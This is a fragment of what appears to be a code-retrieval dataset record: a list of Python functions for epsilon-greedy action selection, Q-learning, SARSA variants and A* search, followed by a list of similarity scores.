a,allQ = sess.run([q_net.predict,q_net.Q_out],feed_dict={q_net.inputs:[s],q_net.keep_per:(1-e)+0.1})\n a = a[0]\n return a", "def select_action(self, state):\n # print(\"agent.select_action() - state: {}\".format(state))\n\n self.step_counter += 1\n # self.epsilon = max(0.1, 1.0-self.step_counter/self.epsilon_decay_steps)\n epsilon_min = .01\n epsilon_max = .8\n epsilon_step = epsilon_max - (epsilon_max - epsilon_min) * self.step_counter / self.epsilon_decay_steps\n self.epsilon = max(epsilon_min, epsilon_step)\n # self.epsilon = max(0.1, 1.0/self.step_counter)\n\n rand = random.uniform(0, 1)\n if rand < self.epsilon:\n # choose random action\n return np.random.choice(self.nA)\n else:\n # choose greedy action\n return np.argmax(self.Q[state])", "def choose_action(env, Q, observation, epsilon):\n if np.random.uniform(0, 1) < epsilon:\n action = env.action_space.sample()\n else:\n action = np.argmax(Q[observation, :])\n return action", "def double_q_learning(env, gamma, n_episode, alpha):\n n_action = env.action_space.n\n n_state 
= env.observation_space.n\n Q1 = torch.zeros(n_state, n_action)\n Q2 = torch.zeros(n_state, n_action)\n for episode in tqdm(range(n_episode)):\n # for episode in range(n_episode):\n state = env.reset()\n is_done = False\n while not is_done:\n action = epsilon_greedy_policy(state, Q1 + Q2)\n next_state, reward, is_done, info = env.step(action)\n if (torch.rand(1).item() < 0.5):\n best_next_action = torch.argmax(Q1[next_state])\n td_delta = reward + gamma * Q2[next_state][best_next_action] - Q1[state][action]\n Q1[state][action] += alpha * td_delta\n else:\n best_next_action = torch.argmax(Q2[next_state])\n td_delta = reward + gamma * Q1[next_state][best_next_action] - Q2[state][action]\n Q2[state][action] += alpha * td_delta\n length_episode[episode] += 1\n total_reward_episode[episode] += reward\n if is_done:\n break\n state = next_state\n policy = {}\n Q = Q1 + Q2\n for state in range(n_state):\n policy[state] = torch.argmax(Q[state]).item()\n return Q, policy", "def act(self, state, epsilon):\n if random.random() > epsilon:\n state = torch.FloatTensor(state)\n q_values = self.dqn(state)\n action = q_values.argmax().item()\n else:\n action = self.env.action_space.sample()\n return action", "def act(self, state, eps=0.):\n state = torch.from_numpy(state).float().unsqueeze(0).to(device)\n self.qnetwork_local.eval()\n with torch.no_grad():\n action_values = self.qnetwork_local(state)\n self.qnetwork_local.train()\n\n # Epsilon-greedy action selection\n if random.random() > eps:\n return np.argmax(action_values.cpu().data.numpy())\n else:\n return random.choice(np.arange(self.action_size))", "def act(self, state, eps=0.):\n state = torch.from_numpy(state).float().unsqueeze(0).to(device)\n self.qnetwork_local.eval()\n with torch.no_grad():\n action_values = self.qnetwork_local(state)\n self.qnetwork_local.train()\n\n # Epsilon-greedy action selection\n if random.random() > eps:\n return np.argmax(action_values.cpu().data.numpy())\n else:\n return random.choice(np.arange(self.action_size))", "def choose_action(self, state):\n if random.random() < self.epsilon:\n self.epsilon -= self.epsilon_annealing_rate\n return random.choice(self.valid_actions)\n \n #initialize search variables\n opt_action = self.valid_actions[0]\n opt_value = 0\n\n #performs a search across all valid actions for highest q-value.\n for action in self.valid_actions:\n cur_value = self.q_value(state, action)\n if cur_value > opt_value:\n opt_action = action\n opt_value = cur_value\n elif cur_value == opt_value:\n opt_action = random.choice([opt_action, action])\n return opt_action", "def get_action_choice(self, state: str, epsilon: float):\n\n # e-greedy\n if random.random() < epsilon:\n return {0: random.choice(Actions.actions), 1: random.choice(Actions.actions)}\n else:\n # Get the Q-values for the actions in this state\n Qs_t = self.Q_t[state]\n\n max_Qs_t = max(Qs_t.values())\n\n # find index of the max Q-values\n max_index = [a for a, q in Qs_t.items()\n if q == max_Qs_t]\n\n # choose one of the max-index with uniform distribution\n selected = random.choice(max_index)\n return {0: selected[0], 1: selected[1]}", "def a_star(initial_state, heuristic, dimension=3):\n\n\tdef add_cost(node):\n\t\tnode.cost = node.depth + heuristic(node.state)\n\n\treturn search(initial_state, Frontier(PriorityQueue), dimension, cost_fn=add_cost)", "def astar_multi(maze):\n # TODO: Write your code here\n gFunction = {}\n frontier = PriorityQueue()\n path = []\n ret = []\n MSTLengths = {}\n edges = {}\n\n objectives = maze.getObjectives()\n 
start = State(maze.getStart()[0], maze.getStart()[1], objectives)\n gFunction[start] = 0\n frontier.put(start) \n getEdgeWeights(maze, objectives, edges) # init edge weights for MST\n\n while not frontier.empty():\n\n currentState = frontier.get()\n currentCell = currentState.cell()\n objectivesLeft = currentState.objectives()\n\n if objectivesLeft.count(currentCell) != 0:\n objectivesLeft.remove(currentCell)\n\n # all objectives found, initialise backtrace and exit loop\n if len(objectivesLeft) == 0:\n path.clear()\n ret.clear()\n path.append(currentState)\n ret.append(currentCell)\n break\n \n # if we have already calculated MST length we can reuse value\n # else calculate MST length for this state and store it.\n length = 0\n if str(objectivesLeft) in MSTLengths:\n length = MSTLengths[str(objectivesLeft)]\n else:\n length = getMSTLength(objectivesLeft.copy(), maze, edges)\n MSTLengths[str(objectivesLeft)] = length\n\n neighbors = maze.getNeighbors(currentCell[0], currentCell[1])\n\n for i in neighbors:\n\n neighbor = State(i[0], i[1], objectivesLeft)\n gVal= gFunction[currentState] + 1\n\n if neighbor not in gFunction or gVal < gFunction[neighbor]:\n\n neighbor.setParent(currentState)\n gFunction[neighbor] = gVal\n\n hFunction = []\n for j in objectivesLeft:\n hFunction.append(abs(j[0] - i[0]) + abs(j[1] - i[1]) + length) # use MST length + manhatten distance to nearest objective as heuristic.\n\n hVal = min(hFunction)\n\n neighbor.setfFunction(gFunction[neighbor] + hVal)\n frontier.put(neighbor)\n\n # backtrace\n while path[0]!= start:\n \n currentCell = path[0]\n path.insert(0, currentCell.parent())\n ret.insert(0, currentCell.parent().cell())\n\n return ret", "def step(self, state, action, reward, next_state, done):\n # print(\"agent.step() - state: {}, action: {}, reward: {}, next_state: {}, done: {}\".format(state, action, reward, next_state, done))\n current_reward_val = self.Q[state][action]\n next_step_greedy_action = np.argmax(self.Q[next_state])\n next_step_reward_val = self.Q[next_state][next_step_greedy_action]\n gamma = 0.75 # toto - paramterize\n self.Q[state][action] = self.Q[state][action] + self.alpha * (\n reward + gamma * next_step_reward_val - self.Q[state][action])", "def update_Q_expsarsa(alpha, gamma, nA, eps, Q, state, action, reward, next_state=None):\n current = Q[state][action] # estimate in Q-table (for current state, action pair)\n policy_s = np.ones(nA) * eps / nA # current policy (for next state S')\n policy_s[np.argmax(Q[next_state])] = 1 - eps + (eps / nA) # greedy action\n Qsa_next = np.dot(Q[next_state], policy_s) # get value of state at next time step\n target = reward + (gamma * Qsa_next) # construct target\n new_value = current + (alpha * (target - current)) # get updated value \n return new_value", "def make_q_update(self, reward, state: str, joint_action: Dict[int, str], next_state, alpha: float, gamma: float):\n previous_value = self.Q_t[state][(joint_action[0], joint_action[1])]\n if '(0, 0)' in next_state:\n max_future_reward = 0\n else:\n max_future_reward = max(self.Q_t[next_state].values())\n new_value = reward + gamma * max_future_reward\n\n self.Q_t[state][(joint_action[0], joint_action[1])] = (1 - alpha) * previous_value + alpha * new_value", "def test_greedy_zero_or_more():\n grammar = r\"\"\"\n S: A* A*;\n terminals\n A: \"a\";\n \"\"\"\n\n g = Grammar.from_string(grammar)\n p = GLRParser(g)\n forest = p.parse(\"a a a a a a\")\n assert len(forest) == 7\n\n # But greedy variant has only one solution where first A*! 
collects all tokens.\n grammar = r\"\"\"\n S: A*! A*;\n terminals\n A: \"a\";\n \"\"\"\n\n g = Grammar.from_string(grammar)\n p = GLRParser(g)\n forest = p.parse(\"a a a a a a\")\n assert len(forest) == 1", "def grid_search_epsilon(environmnet, policy='ε–greedy', parameter='epsilon'):\n\tparameter_values = []\n\tavg_scores = []\n\tavg_steps = []\n\n\tcount = 1\n\tdecay_search = [0.5, 0.6, 0.7, 0.8, 0.9, 0.99, 0.99]\n\tfor param_num in decay_search:\n\n\t\tagent = Q_Agent(exploration_rate_decay=param_num, epsilon=1)\n\t\tall_iterations, all_rewards, step_count = agent.train(environmnet, print_results=True, iter_n=1000,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t policy=policy)\n\t\tavg_scores.append(np.mean(all_rewards))\n\t\tavg_steps.append(np.mean(step_count))\n\t\tparameter_values.append(param_num)\n\t\trewards_data = np.array([all_iterations, all_rewards])\n\t\tstep_data = np.array([all_iterations, step_count])\n\n\t\tnp.savetxt(\n\t\t\t'/Users/matthewgalloway/Documents/RF/q_learning/' + parameter + '_inv/' + parameter + '_rewards_' + str(\n\t\t\t\tparam_num) + '.csv', rewards_data.transpose(), delimiter=\",\")\n\t\tnp.savetxt(\n\t\t\t'/Users/matthewgalloway/Documents/RF/q_learning/' + parameter + '_inv/' + parameter + '_steps_' + str(\n\t\t\t\tparam_num) + '.csv', step_data.transpose(), delimiter=\",\")\n\t\tif count % 50 == 0:\n\t\t\tprint('iteration {} of 10'.format(count))\n\n\t\tcount += 1\n\tresults = {\n\t\t'param_values': parameter_values,\n\t\t'avg_scores': avg_scores,\n\t\t'avg_steps': avg_steps,\n\n\t}\n\tprint(results)\n\treturn pd.DataFrame(results)", "def act(self, state, epsilon=None):\r\n if epsilon is None: epsilon = self.epsilon\r\n q_values = self.value(state)\r\n q_values = q_values.squeeze(1)\r\n if random.random() < epsilon:\r\n aciton = random.randrange(self.action_space.n)\r\n else:\r\n aciton = q_values.argmax(1)[0]\r\n return aciton", "def agentTraining(noOfDecks,\r\n sampleSpaceSearching,\r\n sampleSpaceExploitation,\r\n method,\r\n gamma,\r\n qTable=None):\r\n deckSize = noOfDecks*52\r\n optimalScore = 0 # winning score and losing Score\r\n egreedyScore = 0\r\n pO = [0,0,0]\r\n pe = [0,0,0]\r\n\r\n gamePlay = Dealing(noOfDecks)\r\n gamePlay.newRound()\r\n \r\n agent = adp(deckSize,\r\n gamePlay.deck,\r\n gamePlay.hitScore,\r\n gamePlay.partialDealerScore,\r\n gamePlay.dealerScore,\r\n gamePlay.aceCount,\r\n gamePlay.aceCriticalHit,\r\n gamma)\r\n \r\n # for iterating \r\n if qTable !=None:\r\n if type(qTable) == int:\r\n agent.QList = []\r\n else: \r\n for trajectory in range(len(qTable)):\r\n agent.QList.append(qTable[trajectory])\r\n # for qtable, expect form: [[(trajector1)], [(initialSize,remainingAmount,agentScore,dealerScore',\r\n # NoOfAces,twoAcesOrMore,reward,decision),...]]\r\n \r\n for trajectoryNumber in range(sampleSpaceSearching + sampleSpaceExploitation):\r\n exploredStateAction = []\r\n while gamePlay.ifGameEnd() == False: \r\n \r\n if trajectoryNumber < sampleSpaceSearching: # condition for still exploring \r\n \r\n e = 100 / (100+len(exploredStateAction)) # as explore more, more likely to\r\n # stick to optimal policy\r\n action = agent.eGreedyPolicyQTable(e, \r\n deckSize,\r\n gamePlay.remainingDeckSize,\r\n gamePlay.hitScore, # true cards\r\n gamePlay.partialDealerScore, # visible to agent\r\n gamePlay.dealerScore, # true cards\r\n gamePlay.aceCount,#8\r\n gamePlay.aceCriticalHit)#8\r\n else: # if in exploitation phase \r\n action = agent.optimalPolicyQTable(deckSize,\r\n gamePlay.remainingDeckSize,\r\n gamePlay.hitScore,\r\n 
gamePlay.partialDealerScore,#8\r\n gamePlay.dealerScore,\r\n gamePlay.aceCount,#8\r\n gamePlay.aceCriticalHit)#8\r\n\r\n numRemaining = gamePlay.remainingDeckSize\r\n agentScore = gamePlay.hitScore\r\n agentVisScore = gamePlay.partialDealerScore\r\n actualDealerScore = gamePlay.dealerScore\r\n numOfaces = gamePlay.aceCount\r\n criticalAce = gamePlay.aceCriticalHit # boolean \r\n reward = gamePlay.actionOutcome(action)\r\n # if gamePlay.actionOutcome(action) method executed, newround or hit method is \r\n # also exectued. this inturn updates gameplay details. Hence assigned \r\n # variables prior to method excecution\r\n stateAction = (deckSize, numRemaining,\r\n agentScore,agentVisScore,\r\n actualDealerScore, numOfaces,\r\n criticalAce, reward,\r\n action)\r\n\r\n if stateAction not in agent.QList and (agentScore >= actualDealerScore\r\n and agentScore <= gamePlay.blackJack):\r\n # if not a repeated state-action anywhere in my searchedSpace, save it\r\n exploredStateAction.append(stateAction)\r\n \r\n if gamePlay.ifGameEnd() == True:\r\n agent.QList.append(exploredStateAction)\r\n agent.QTableUpdate(method,\r\n reward,\r\n gamma)\r\n break\r\n\r\n if trajectoryNumber > sampleSpaceSearching: # optimal policy \r\n if reward > 0: \r\n optimalScore += gamePlay.hitScore**2\r\n pO[0] +=1 # winning points\r\n if reward ==0:\r\n pO[1] +=1 \r\n if reward < 0:\r\n pO[2] += 1\r\n \r\n else: # eGreedy policy \r\n if reward > 0: \r\n egreedyScore += gamePlay.hitScore**2\r\n pe[0] +=1 # winning points\r\n if reward ==0:\r\n pe[1] +=1\r\n if reward < 0:\r\n pe[2] +=1\r\n \r\n print(\"Deck size = {} deck(s) using policy\"\r\n \" search method: {}\".format(gamePlay.deckSize,\r\n method)) \r\n \r\n print(\"The agent exploration period = {} rounds.Followed by {}\"\r\n \" rounds of exploitation\".format(sampleSpaceSearching,sampleSpaceExploitation))\r\n\r\n print(\"The Agent average quadratic score per game exploration phase = {}\"\r\n \" The exploitation quadratic score per game = {}\"\r\n \" In terms of winning and loosing against the house,\"\r\n \" the Agent wins {}% draws {}% and loses {}% on the training (explore) stage, followed by \"\r\n \" wins {}% draws {}% and loses {}% on the\"\r\n \" testing (exploitation) stage \".format((egreedyScore/sampleSpaceSearching),\r\n (optimalScore/sampleSpaceExploitation),\r\n np.round(pe[0]/sum(pe)*100,1 ),\r\n np.round(pe[1]/sum(pe)*100,1 ),\r\n np.round(pe[2]/sum(pe)*100,1 ),\r\n np.round(pO[0]/sum(pO)*100,1 ),\r\n np.round(pO[1]/sum(pO)*100,1 ),\r\n np.round(pO[2]/sum(pO)*100,1 ))) \r\n\r\n return agent.QList, pe, pO, egreedyScore, optimalScore", "def step(self, state, action, reward, next_state, done):\n self.i_episode += 1\n Q = self.Q\n \n self.currentPolicy_s = self.epsilon_greedy_probs(self.Q[next_state], self.i_episode, 0.005)\n newQ = self.update_Q(Q[state][action], \\\n np.dot(Q[next_state], self.currentPolicy_s), \\\n reward, \\\n self.getAlpha(), \\\n self.getGamma())\n self.Q[state][action] = newQ", "def chooseAction(self, epsilon, state):\n if random.uniform(0, 1) < epsilon:\n return random.randrange(9)\n\n cur_best_val = -float('inf')\n cur_best_action = 0\n\n data = env.getAllNextStates(state)\n\n with torch.no_grad():\n for action, next_state, done in data:\n if next_state != state:\n value = self.NN(self.RBF[next_state]).item() if not done else 0\n if value > cur_best_val:\n cur_best_val = value\n cur_best_action = action\n #print(data)\n return cur_best_action", "def get_greedy_actions(self, state):\n state_action_values = 
self.get_action_values(state) # What are the value that we could get from current state\n\n max_action_value = max(state_action_values) # What is the higher value\n max_value_indices = [i for i, value in enumerate(state_action_values) if\n value == max_action_value] # Gets their indices\n\n # Prepares action probabilites for the ones with the higher value\n action_probs = np.zeros((4,))\n action_probs[max_value_indices] = 1 / (len(max_value_indices) if type(max_value_indices) is list else 1)\n\n return action_probs", "def astar(G,s,g,cost=(lambda v,w:1),heuristic=(lambda v:0),verbose=1):\n if not callable(g):\n gtest = lambda x,goal=g: x==g\n else:\n gtest = g\n d = dict((v,float('inf')) for v in G.nodes())\n p = dict((v,None) for v in G.nodes())\n d[s] = 0\n Q = [(0,0,s)] #each element is a tuple (f,-c,v) with f=c + heuristic(v), c=cost from start, v=vertex\n nnodes = 0\n while len(Q) > 0:\n f,minus_c,v = heapq.heappop(Q) #get the element in the queue with the least value of c\n nnodes += 1\n if gtest(v):\n #found a path\n if verbose: print(\"A* succeeded in\",nnodes,\"iterations\")\n return predecessor_traverse(p,s,v),d,p\n for w in G.neighbors(v):\n dcand = d[v] + cost(v,w) #this is the cost of going through v to w\n if dcand < d[w]:\n #going through v is optimal\n #if the predecessor of w is not None, then we'll have to adjust the heap\n if p[w] is not None:\n Q = [(f,c,x) for (f,c,x) in Q if x is not w]\n heapq.heapify(Q)\n d[w] = dcand\n p[w] = v\n #put w back on the queue, with the heuristic value as its priority\n heapq.heappush(Q,(dcand+heuristic(w),-dcand,w))\n #no path found\n if verbose: print(\"A* failed in\",nnodes,\"iterations\")\n return None,d,p", "def predict_plan(self, time_step: TimeStep, state: PlannerState,\n epsilon_greedy):\n pass", "def get_next_action(self, epsilon, learning_params):\n\n T = learning_params.T\n\n if random.random() < epsilon:\n # With probability epsilon, randomly select an action for each agent.\n a_selected = np.full(self.num_agents, -1, dtype=int)\n for i in range(self.num_agents):\n a_selected[i] = random.choice(self.actions[i])\n else:\n partial_index = [] # Don't include action indexes. 
As a result, in pr_sum, we are summing over actions.\n for i in range(self.num_agents):\n partial_index.append(self.s[i])\n partial_index.append(self.u)\n partial_index = tuple(partial_index)\n\n # Sum over all possible actions for fixed team state and reward machine state.\n pr_sum = np.sum(np.exp(self.q[partial_index] * T))\n\n # pr[i] is an array representing the probability values that agent i will take various actions.\n pr = np.exp(self.q[partial_index] * T)/pr_sum\n\n shp = pr.shape\n pr = pr.flatten()\n\n pr_select = np.zeros([len(pr) + 1, 1])\n pr_select[0] = 0\n for i in range(len(pr)):\n pr_select[i+1] = pr_select[i] + pr[i]\n\n randn = random.random()\n for i in range(len(pr)):\n if randn >= pr_select[i] and randn <= pr_select[i+1]:\n a_selected = np.unravel_index(i, shp)\n a_selected = np.array(a_selected, dtype=int)\n break\n\n a = a_selected\n\n return self.s, a", "def take_action(self, state):\n if self.epsilon_decay is not None:\n self.epsilon *= self.epsilon_decay\n if random.random() < self.epsilon:\n action = super(BaseQAgent, self).random_next_action(state)\n self.log('exploration move: {0}'.format(str(action)))\n else:\n action = self.greedy_next_action(state)\n self.log('exploitation move: {0}'.format(str(action)))\n return action", "def update_Q(self, state, action, reward, new_state = None):\n Q_val = self.Q[state][action]\n \n # Look at the best action from the next state.\n Qp_val = 0\n if new_state is not None:\n Qp_val = max(self.Q[new_state].values())\n \n # The famous formula:\n Q_val = Q_val + self.alpha * (reward + self.gamma * Qp_val - Q_val)\n #print self.alpha\n #print state, 'action: ', action\n #print 'Q[%s]: %s' % (state, self.Q[state])\n #print 'Q val: ', Q_val\n \n self.Q[state][action] = Q_val\n \n return None", "def choose_action(s, epsilon):\n # Update PI(s, a) for all actions a for that state s:\n # action probabilities = epsilon/(|A|-1) for all actions by default\n # over |A|-1 because 1 of them will be optimal and have proba 1-epsilon\n global PI\n PI[s, :] = [epsilon / (len(ACTIONS)-1.)] * len(ACTIONS)\n\n # Get the best action for that state (greedy w.r.t. Q):\n best_a = 0\n best_q_val = -np.inf\n for i, q_val in enumerate(Q[s,:]):\n if q_val > best_q_val:\n best_q_val = q_val\n best_a = i\n\n # Change default proba of best action to be 1-epsilon\n PI[s, best_a] = 1. 
- epsilon\n # print \"best action:\", best_a\n assert np.isclose(np.sum(PI[s, :]), 1.)\n\n # sample from ACTIONS with proba distribution PI[s, :]\n return np.random.choice(ACTIONS, p=PI[s, :])", "def sample(self, observation):\n if not isinstance(observation, self.state_space):\n raise KeyError\n if random.random() < self.epsilon(observation):\n actions = self.valid_actions()\n return actions[random.randint(0, len(actions) - 1)]\n else:\n return super(EpsilonGreedy, self).sample(observation)", "def astar(maze):\n # TODO: Write your code here\n gFunction = {}\n frontier = PriorityQueue()\n path = []\n ret = []\n objectives = maze.getObjectives()\n start = State(maze.getStart()[0], maze.getStart()[1], objectives[0])\n gFunction[start] = 0\n frontier.put(start)\n\n while not frontier.empty():\n\n currentState = frontier.get()\n currentCell = currentState.cell()\n\n # objective found, initialise backtrace and exit search\n if maze.isObjective(currentCell[0], currentCell[1]):\n\n path.append(currentState)\n ret.append(currentCell)\n break\n\n neighbors = maze.getNeighbors(currentCell[0], currentCell[1])\n\n for i in neighbors:\n\n neighbor = State(i[0], i[1], objectives[0])\n gVal= gFunction[currentState]+1\n\n # if neighbor is not visited or if we found better path to it, add it to the frontier\n if neighbor not in gFunction or gVal < gFunction[neighbor]:\n neighbor.setParent(currentState)\n gFunction[neighbor] = gVal\n hFunction = abs(objectives[0][0] - i[0]) + abs(objectives[0][1] - i[1]) # use manhatten distance as heuristic\n neighbor.setfFunction(gFunction[neighbor] + hFunction)\n frontier.put(neighbor)\n\n # backtrace\n while path[0]!= start:\n \n currentCell = path[0]\n path.insert(0, currentCell.parent())\n ret.insert(0, currentCell.parent().cell())\n\n return ret", "def heuristic_fn(x, clf, manifest_set, epsilon, q_norm=np.inf):\r\n # Debug.\r\n counter = Counter.get_default()\r\n count = counter.count()\r\n if count % DEBUG_FREQ == 0:\r\n logger.debug(\">> (heuristic_fn start) Node counter is: {}.\".format(count))\r\n\r\n score = clf.decision_function([x])[0]\r\n if score <= 0:\r\n return 0.0\r\n h = np.abs(score) / np.linalg.norm(clf.coef_[0, list(manifest_set)], ord=q_norm)\r\n\r\n return h * epsilon", "def a_star_search(problem, heuristic=null_heuristic):\r\n \"*** YOUR CODE HERE ***\"\r\n fringe = util.PriorityQueue()\r\n path = set()\r\n final = []\r\n acts = dict()\r\n state = problem.get_start_state()\r\n fringe.push(state, 0)\r\n\r\n while (True):\r\n state = fringe.pop()\r\n path.add(state)\r\n states = problem.get_successors(state)\r\n acts[state] = states[:]\r\n if problem.is_goal_state(state):\r\n break\r\n\r\n states = problem.get_successors(state)\r\n # push into fringe\r\n for stat in states:\r\n if stat[0] not in path:\r\n \"\"\"\r\n it does worse in corners problems, to work better needs heavy huristic, not worth in\r\n in corners problem expandend nodes grow expo\r\n all others are better\r\n counter = 0 # in some situation it helps, in some it doesnt\r\n #print(stat[0].pieces)\r\n for x in stat[0].pieces[0]:\r\n if x:\r\n counter += 1\r\n \"\"\"\r\n counter = 0\r\n fringe.push(stat[0], stat[2] + counter + heuristic(stat[0], problem)) # problem.get_cost_of_actions([stat[1]])\r\n\r\n while (True):\r\n\r\n for key, val in acts.items():\r\n for va in val:\r\n if va[0] == state:\r\n final.append(va[1])\r\n state = key\r\n break\r\n else:\r\n continue\r\n break\r\n if state == problem.get_start_state():\r\n break\r\n\r\n final.reverse()\r\n\r\n return final", "def 
astar(grid, heuristic):\r\n\r\n print (grid.getStart())\r\n frontier = PriorityQueue()\r\n frontierCpy = {}\r\n\r\n goal = grid.getGoals()[0]\r\n\r\n startX = grid.getStart()[0]\r\n startY = grid.getStart()[1]\r\n startNode = Node(((startX, startY), 0), None)\r\n\r\n init_heu = heuristic(startNode.cell[0], goal)\r\n frontierCpy[startNode.cell[0]] = init_heu\r\n frontier.put((init_heu, 0, startNode))\r\n\r\n while frontier.qsize() != 0:\r\n tup = frontier.get()\r\n\r\n currNode = tup[2]\r\n currG = tup[1] * -1\r\n grid.addVisited(currNode.cell[0])\r\n frontierCpy.pop(currNode.cell[0], None)\r\n\r\n if currNode.cell[0] == goal:\r\n path = []\r\n while currNode != None:\r\n path.insert(0, currNode.cell[0])\r\n currNode = currNode.parent\r\n grid.setPath(path)\r\n return path\r\n\r\n\r\n neighbors = grid.getNeighbors(currNode.cell[0])\r\n\r\n for n in neighbors:\r\n if n[0] not in grid.getVisited():\r\n newNode = Node(n, currNode)\r\n\r\n h = heuristic(n[0], goal)\r\n\r\n oneStepCost = n[1]\r\n g = oneStepCost + currG\r\n if n[0] not in frontierCpy or frontierCpy[n[0]] > h + g:\r\n frontier.put((h+g, -1*g, newNode))\r\n frontierCpy[n[0]] = h+g\r\n print(\"CANT FIND A PATH\")", "def step(self, new_state, reward=None, done=None, mode='train'):\n\n if mode == 'test':\n # Test mode: take greedy action\n action = np.argmax(self.q_table[new_state])\n return action\n \n else:\n # Train mode: take a step and return action\n \n # QL step update \n if self.learning == \"q_learning\":\n self.q_table[self.last_state, self.last_action] += self.alpha * \\\n (reward + self.gamma * max(self.q_table[new_state]) - self.q_table[self.last_state, self.last_action])\n new_action = action_egreedy(self.q_table[self.last_state], self.epsilon, self.action_size)\n \n # SARSA step update \n elif self.learning == \"sarsa\":\n new_action = action_egreedy(self.q_table[new_state], self.epsilon, self.action_size)\n self.q_table[self.last_state, self.last_action] += self.alpha * \\\n (reward + self.gamma * self.q_table[new_state, new_action] - self.q_table[self.last_state, self.last_action])\n \n # Expected SARSA step update \n elif self.learning == \"expected_sarsa\":\n self.q_table[self.last_state, self.last_action] += self.alpha * \\\n (reward + self.gamma * np.mean(self.q_table[new_state]) - self.q_table[self.last_state, self.last_action])\n new_action = action_egreedy(self.q_table[new_state], self.epsilon, self.action_size)\n \n # Double Sarsa step update \n elif self.learning == \"double_sarsa\":\n new_action = action_egreedy(np.mean([self.q_table_1[new_state],self.q_table_2[new_state]], axis=0), self.epsilon, self.action_size)\n if random.random() < 0.5:\n self.q_table_1[self.last_state, self.last_action] += self.alpha * (reward + self.gamma * self.q_table_1[new_state, new_action] - self.q_table_1[self.last_state, self.last_action])\n else:\n self.q_table_2[self.last_state, self.last_action] += self.alpha * (reward + self.gamma * self.q_table_2[new_state, new_action] - self.q_table_2[self.last_state, self.last_action])\n \n # Double Expected Sarsa step update \n elif self.learning == \"double_expected_sarsa\":\n if random.random() < 0.5:\n self.q_table_1[self.last_state, self.last_action] += self.alpha * (reward + self.gamma * np.mean(self.q_table_2[new_state]) - self.q_table_1[self.last_state, self.last_action])\n else:\n self.q_table_2[self.last_state, self.last_action] += self.alpha * (reward + self.gamma * np.mean(self.q_table_1[new_state]) - self.q_table_2[self.last_state, self.last_action])\n new_action = 
action_egreedy(np.mean([self.q_table_1[new_state],self.q_table_2[new_state]], axis=0), self.epsilon, self.action_size)\n \n # Double QL step update \n elif self.learning == \"double_q_learning\":\n if random.random() < 0.5:\n self.q_table_1[self.last_state, self.last_action] += self.alpha * (reward + self.gamma * self.q_table_2[new_state, np.argmax(self.q_table_1[new_state])] - self.q_table_1[self.last_state, self.last_action])\n else:\n self.q_table_2[self.last_state, self.last_action] += self.alpha * (reward + self.gamma * self.q_table_1[new_state, np.argmax(self.q_table_2[new_state])] - self.q_table_2[self.last_state, self.last_action])\n new_action = action_egreedy(np.mean([self.q_table_1[self.last_state],self.q_table_2[self.last_state]], axis=0), self.epsilon, self.action_size)\n \n else:\n raise ValueError('Learning algorithm not supported')\n \n #rollout state and action\n self.last_state = new_state\n self.last_action = new_action\n return new_action" ]
[ "0.7148608", "0.64981556", "0.63126504", "0.62986714", "0.62594926", "0.6258449", "0.61423904", "0.6026595", "0.60167265", "0.59709555", "0.5897679", "0.5888596", "0.58737326", "0.58079225", "0.58033264", "0.5781088", "0.5732777", "0.5710433", "0.57000035", "0.5699515", "0.5695676", "0.5652269", "0.5648659", "0.5643459", "0.5638543", "0.5613077", "0.55964935", "0.5576189", "0.555762", "0.5552006", "0.5541834", "0.5537452", "0.55301225", "0.5494151", "0.548778", "0.5433084", "0.54034096", "0.53815144", "0.5365881", "0.5342009", "0.5337422", "0.5332077", "0.53305286", "0.52868897", "0.5283162", "0.5275392", "0.52738607", "0.5263156", "0.5213331", "0.5208851", "0.52029425", "0.5197542", "0.5193976", "0.5165022", "0.5119767", "0.5104065", "0.50921494", "0.50917864", "0.50905246", "0.5076543", "0.50760096", "0.5073258", "0.5066211", "0.50596786", "0.50543314", "0.5044463", "0.50210625", "0.5015574", "0.5002526", "0.49966455", "0.4993492", "0.49920812", "0.49743044", "0.49743044", "0.4961347", "0.4960545", "0.4931127", "0.4928061", "0.49246886", "0.49178782", "0.49177587", "0.49153376", "0.49140078", "0.49071714", "0.49049428", "0.48991644", "0.4896857", "0.48930943", "0.4886131", "0.4883988", "0.4857254", "0.48544785", "0.48520705", "0.48408642", "0.48348117", "0.48292097", "0.4825361", "0.482286", "0.48188612", "0.48181337" ]
0.6940285
1
The channel does not maintain a queue. The phy/mac must do that.
def __init__(self, layer_delay=_default_layer_delay):
    self._attached_phys = []
    self._layer_delay = layer_delay
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def tryToSend( self, channel, value ):\n if self.free:\n self.free = False\n self.writeToSerial( channel, value )\n elif len( self.queue ) > MAX_QUEUE_SIZE:\n raise DCBoxError( 2 )\n else: self.queue.append( ( channel, value ) )", "def on_queue_declared(frame):\n channel.basic_consume(handle_delivery, queue='test')", "def channel(self):\n raise NotImplementedError", "def test_queue():\n mq = IPCComm.get_queue()\n key = str(mq.key)\n assert(CommBase.is_registered('IPCComm', key))\n CommBase.unregister_comm('IPCComm', key, dont_close=True)\n nt.assert_raises(KeyError, IPCComm.remove_queue, mq)\n CommBase.register_comm('IPCComm', key, mq)\n IPCComm.remove_queue(mq)\n assert(not CommBase.is_registered('IPCComm', key))", "def on_channel_open(new_channel):\n global channel\n channel = new_channel\n channel.queue_declare(queue=\"test\", durable=True, exclusive=False, auto_delete=False, callback=on_queue_declared)", "def dequeue(self):\n pass", "def dequeue(self):\n pass", "def on_channel_open(self, new_channel):\n\t\tself.channel = new_channel\n\t\tself.declare_queue(self.on_queue_declared)", "def dequeue(self):", "def __init__(self):\r\n self.queue = []\r\n self.current = False", "def blank(self, channel):\n pass", "async def channel(self, ctx):\n pass", "def curr_queue(self):\n pass", "def testQueueMsg(self):\n self.mgr.isGoproBusy = True\n self.mgr.lastRequestSent = monotonic.monotonic()\n self.mgr.queueMsg(4)\n self.assertFalse( self.mgr.msgQueue.empty() )\n self.assertTrue(self.mgr.isGoproBusy)", "def get_queue(self):\r\n return _channeldata[self.chan].queue", "def __init__(self):\r\n self.queue = []", "def __init__(self):\r\n self.queue = []", "def __clear_message_queue(self):\r\n self.__lib.CC_ClearMessageQueue(self.__serno)", "def dispatch_frame(self, frame):\n if frame.command == 'RECEIPT':\n self.receipt_queue.put(frame)\n elif frame.command == 'MESSAGE':\n with self.subscription_lock:\n if frame.destination in self.subscribed_destinations:\n enqueue = True\n else:\n enqueue = False\n if self.debug:\n self.log.debug(\"Ignoring frame for unsubscribed destination: %s\" % frame)\n if enqueue:\n self.message_queue.put(frame)\n elif frame.command == 